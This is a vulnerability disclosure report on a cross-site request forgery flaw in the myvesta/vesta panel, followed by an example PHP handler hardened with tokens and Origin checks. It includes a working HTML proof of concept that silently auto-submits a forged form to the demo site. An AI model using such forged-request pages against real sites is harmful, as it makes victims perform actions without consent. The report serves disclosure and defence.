Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


โœ๏ธ Description

An attacker is able to add an element to favorites. This vulnerability happens on some sections, for example on the "Firewall" tab (list/firewall/).

๐Ÿ•ต๏ธโ€โ™‚๏ธ Proof of Concept

1. When you are logged in, open this POC.html in a browser.
2. You can check that the first record is unintentionally saved as a favorite.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/add/favorite/index.php">
<input type="hidden" name="v&#95;unit&#95;id" value="11" />
<input type="hidden" name="v&#95;section" value="firewall" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
document.forms[0].submit();
</script>
</html>

💥 Impact

This vulnerability is capable of forcing an admin or user to unintentionally save a favorite.
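The report shows the forged request but not what a protected handler looks like. The following is an added example, not myvesta/vesta code and not the fix that was merged in 475fe4: a small PHP add-favorite handler that rejects the PoC above by requiring a POST carrying a per-session synchronizer token, checking the Origin header when present, and setting the session cookie to SameSite=Lax as defence in depth. The function names (csrf_token, csrf_check, favorite_form_html, add_favorite_handler), the token field name and the sample host are assumptions; the parameters v_unit_id and v_section are taken from the PoC.

```php
<?php
// Added example, not myvesta/vesta code and not the fix merged in 475fe4.
// Assumed names: csrf_token(), csrf_check(), favorite_form_html(), add_favorite_handler().
// The parameters v_unit_id and v_section come from the PoC above.
declare(strict_types=1);

// Defence in depth: a SameSite=Lax session cookie is not attached to cross-site
// POSTs, so a forged form post arrives without the victim's session.
// Must be called before session_start(); array form needs PHP 7.3+.
session_set_cookie_params(['samesite' => 'Lax', 'secure' => true, 'httponly' => true]);
session_start();

// Issue (or reuse) a per-session synchronizer token to embed in every
// state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Render the add-favorite form with the token field the PoC form lacked.
function favorite_form_html(string $action, int $unitId, string $section): string
{
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="' . $e($action) . '">'
        . '<input type="hidden" name="token" value="' . $e(csrf_token()) . '">'
        . '<input type="hidden" name="v_unit_id" value="' . $unitId . '">'
        . '<input type="hidden" name="v_section" value="' . $e($section) . '">'
        . '<button type="submit">Add to favorites</button></form>';
}

// True only for a POST whose token matches the session's (constant-time
// compare) and whose Origin header, when the browser sends one, is our own host.
function csrf_check(array $post, array $server): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;               // the PoC's GET request stops here
    }
    $sent = $post['token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        return false;               // missing or forged token
    }
    if (isset($server['HTTP_ORIGIN'])) {
        $originHost = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        $ownHost = explode(':', $server['HTTP_HOST'] ?? '', 2)[0];
        if ($originHost === null || strcasecmp($originHost, $ownHost) !== 0) {
            return false;           // form posted from another origin
        }
    }
    return true;
}

// Hardened handler: returns the HTTP status it would send.
function add_favorite_handler(array $post, array $server): int
{
    if (!csrf_check($post, $server)) {
        return 403;
    }
    $unitId = filter_var($post['v_unit_id'] ?? null, FILTER_VALIDATE_INT);
    $section = $post['v_section'] ?? '';
    if ($unitId === false || !is_string($section) || !preg_match('/^[a-z_]+$/', $section)) {
        return 400;                 // reject unexpected identifiers before storing
    }
    // ... persist ($unitId, $section) for the logged-in user here ...
    return 200;
}

// Smoke test with constructed values: a PoC-style request (GET, no token) is
// rejected, a token-bearing same-origin POST is accepted.
$server = ['HTTP_HOST' => 'panel.example.invalid'];
$poc = add_favorite_handler(['v_unit_id' => '11', 'v_section' => 'firewall'],
                            $server + ['REQUEST_METHOD' => 'GET']);
$ok = add_favorite_handler(['token' => csrf_token(), 'v_unit_id' => '11', 'v_section' => 'firewall'],
                           $server + ['REQUEST_METHOD' => 'POST',
                                      'HTTP_ORIGIN' => 'https://panel.example.invalid']);
echo "PoC-style request: $poc, legitimate request: $ok\n";
```

The token check alone defeats the PoC because the attacker's page cannot read the victim's session token; the method, Origin and SameSite checks are layered so that a single mistake (for example a handler that still accepts GET) does not reopen the issue.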

💥 Test

Tested on Edge, Firefox, Chrome and Safari

📍 Location

index.php#L1

📍 References

csrf

Occurrences

References

We have contacted a member of the myvesta/vesta team and are waiting to hear back 3 months ago
Musio modified their report 3 months ago
myvesta validated this vulnerability 3 months ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta confirmed that a fix has been merged on 475fe4 3 months ago
myvesta has been awarded the fix bounty